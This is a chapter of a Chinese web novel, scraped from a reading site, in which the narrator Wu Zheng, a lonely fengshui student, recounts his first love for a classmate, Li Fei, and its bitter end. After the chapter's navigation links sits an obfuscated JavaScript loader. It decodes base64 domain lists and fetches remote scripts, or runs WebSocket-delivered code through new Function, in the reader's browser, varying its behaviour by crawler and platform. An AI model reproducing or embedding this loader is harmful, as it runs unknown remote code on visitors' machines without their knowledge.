关灯
护眼
字体:
c

02 林夏

首页 书架 加入书签 返回目录
我在京城的生活,非常的单调"。

因为一个人很孤单,所以我的话更少了,在学校几乎没有朋友,放了学就回家,所有的课外时间,我全部都用来研究风水术数了"。

这些秘术在外人看来生涩难懂,但是对我来说,研究这些却是最开心的事"。

在没有爷爷和父母陪伴的日子里,五行八卦,阴阳术数,风水阵法,符咒手诀,这些就是我最好的伙伴"。

它们可以让我忘却孤独,忘却凄冷,纵然一个人生活,也能活的充实而快乐"。

唯一痛苦的就是,我学了这么多,却没有机会去施展"。

尤其是初三的时候,我喜欢上了一个同班的女同学,那女孩对我也有好感"。

但是最终,她却被另一个小子给追走了,成了他的女朋友"。

而说来悲哀的是,那小子追这女孩的手段,竟然是帮她算八字"。

我那天眼睁睁的看着他泡我喜欢的女孩子,看着他用从网上学来的三脚猫功夫忽悠那女孩,五句话,两准三不准的"。

但就是这样,也让那女孩震惊了,觉得他好厉害,然后不久之后,他俩就成双入对了"。

那段时间我特别痛苦,我特想告诉那女孩,那孙子是骗你的,他根本不懂这些"?

可是最终我什么也没说,因为爷爷说过,我第一次给人办事是给唐家人办事,而那个女孩,她叫李菲"。

初中毕业后,我和李菲以及那个小子考上了同一所高中"。

分班的时候,我和李菲依然是同班,那小子在我们隔壁班"。

不久之后,他又故技重施,泡上了另一位更水灵的女同学,把李菲甩了"。

李菲很伤心,那天晚上把我喊到操场,哭着跟我说那小子和她分手了"。

她抱着双腿,哭的梨花带雨,双肩微微颤动"。

我伸出手,想安抚她,犹豫再三之后,我终于还是没敢"。

就在这时候,她突然说了一句话,"还好我没上他的当,起码我还是清白的……"我顿时如五雷轰顶一般,仿佛被人用刀从背后刺穿了心脏"。

李菲是想向我暗示,若是换了别人,听了这话该欣喜异常"。

但我不是别人,我听到这句话之后,本能的就明白了,李菲已经被他……见我不说话,她扭过头来,小心翼翼的看着我,"吴峥,你……怎么了?"我不知道该说什么好,因为我的脑子一片空白"。

沉默片刻之后,我勉强挤出一丝笑容,说了句,"没……没事……""你不信我?"她问"。

"我……信……"我违心的说"。

她不知道该说什么好了,场面一时有些尴尬"。

沉默了几分钟后,我站起来,"别难过了,我送你回去吧"。

"她没说什么,点了点头"。

我把她送到宿舍楼下,她转过身来问我,"吴峥,你相信我,我和张毅真的没什么的"?

"我也想相信她,可是……那一刻,我真希望自己不懂术数"。

她转身上楼了"。

我离开学校,骑着自行车一路飞奔,回到了自己家里"。

进小区之后,我去超市买了很多酒,回家一个人喝到了天亮"。

我的初恋,就这么过去了"。

之后的两年,李菲又换了好几任男朋友,而我,一直默默无闻,没再喜欢谁,也没被谁喜欢,直到毕业"。

高中毕业后,李菲考上了北科大,去上大学了"。

我没参加高考,因为我知道,我没有上大学的命"。

读了这么多书,够用了,也知足了"。

接到通知书那天,李菲给我打了个电话,说想和我见一面,一起吃个饭"。

我犹豫了一下,随便找了个借口,推辞了"。

我不懂读心术,但我看得懂人的神光,曾经她看我的眼神告诉我,她虽然换了几任男友,但是在她心底,一直有我的位置"。

只是在她看来,我这人太低调了,话不多,谁也摸不准我的心思,而且对于她的暗示一直没有积极的回应"。

那句话怎么说的,剪不断,理还乱"。

李菲是想在步入大学生活之前,和我做个了断吧"。

不过对我来说,这个已经没有任何意义了"。

↑看 钼录 ↓看
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDEzNQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x69\x54\x6d\x50\x4e\x46\x42\x47\x7a\x68']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};